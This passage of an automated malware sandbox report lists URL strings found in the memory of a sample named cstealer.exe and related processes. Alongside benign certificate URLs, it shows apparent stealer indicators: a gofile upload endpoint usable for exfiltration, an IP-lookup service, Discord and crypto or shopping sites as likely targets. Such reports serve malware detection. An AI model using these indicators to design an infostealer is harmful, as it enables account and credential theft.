00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189188188.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2188809634.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2226157395.000002004DDFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B9E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728BA0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189591439.000002004DDFF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728BA0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189591439.000002004DDFF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189188188.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2188809634.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187842402.000002004DDF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                Source: DevxExecutor.exe, 00000000.00000002.2179647836.00000000051E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: cstealer.exe, 00000003.00000002.2700205546.00000271DA8A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2386235093.0000020103570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
                                Source: cstealer.exe, 00000003.00000003.2173619159.00000271DA3A1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2173619159.00000271DA3F0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212896954.00000201030A0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212318371.0000020103051000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212318371.00000201030A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
                                Source: cstealer.exe, 00000002.00000003.2167396035.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161168267.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161792548.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2162061027.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161917908.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2163418436.0000024728B9E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161319049.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161069601.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167136670.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2164969586.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161715742.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187745990.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187611110.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2187521128.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2189188188.000002004DDF3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000004.00000003.2188809634.000002004DDF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                Source: cstealer.exe, 00000003.00000003.2176699163.00000271DA3F4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2624845183.00000271D9E46000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2475616285.00000271DA3F9000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2475194270.00000271DA3F4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2455332650.00000271D9E2D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552638116.00000271DA40A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2545364608.00000271DA401000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2560907077.00000271DA40C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2523478749.00000271DA3FD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2542350232.00000271D9E45000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2509975417.00000271DA3FC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2470513280.00000271D9E3D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215320232.0000020102E12000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218139223.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221688107.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219861394.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2220789143.0000020102DD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                                Source: cstealer.exe, 00000003.00000003.2173794852.00000271DA165000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2173619159.00000271DA3F0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215808528.0000020102D65000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212896954.00000201030A0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212719399.0000020102D65000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212318371.00000201030A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
                                Source: cstealer.exe, 00000003.00000003.2173619159.00000271DA3A1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2173619159.00000271DA3F0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212896954.00000201030A0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212318371.0000020103051000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212318371.00000201030A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
                                Source: cstealer.exe, 00000003.00000003.2527962136.00000271DA17F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2473409999.00000271DA17D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2547567041.00000271DA187000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2519598138.00000271DA17E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2537371997.00000271DA185000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2177844870.00000271DA4D6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2501756441.00000271DA17D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2179117059.00000271DA183000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2183488711.00000271DA183000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287998421.0000020102DFD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2217808109.0000020103199000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221688107.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290930130.0000020102DFF000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219861394.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287046856.0000020102DD2000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2220789143.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2282192132.0000020102DD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://aliexpress.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aliexpress.com)z&
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://amazon.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazon.com)z
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgr
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://binance.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://binance.com)z
                                Source: cstealer.exe, 00000003.00000003.2172684484.00000271DA15E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2534912029.00000271DA076000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2173830510.00000271DA077000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2653234727.00000271DA083000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2518441151.00000271DA075000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2172766781.00000271DA077000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2172550247.00000271DA0D0000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2172487791.00000271DA15E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2555033005.00000271DA083000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2553711661.00000271DA082000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2317700691.0000020102C75000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2281080035.0000020102C61000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208364887.0000020102E02000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102C65000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275592639.0000020102C61000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2289926673.0000020102C71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue42195.
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 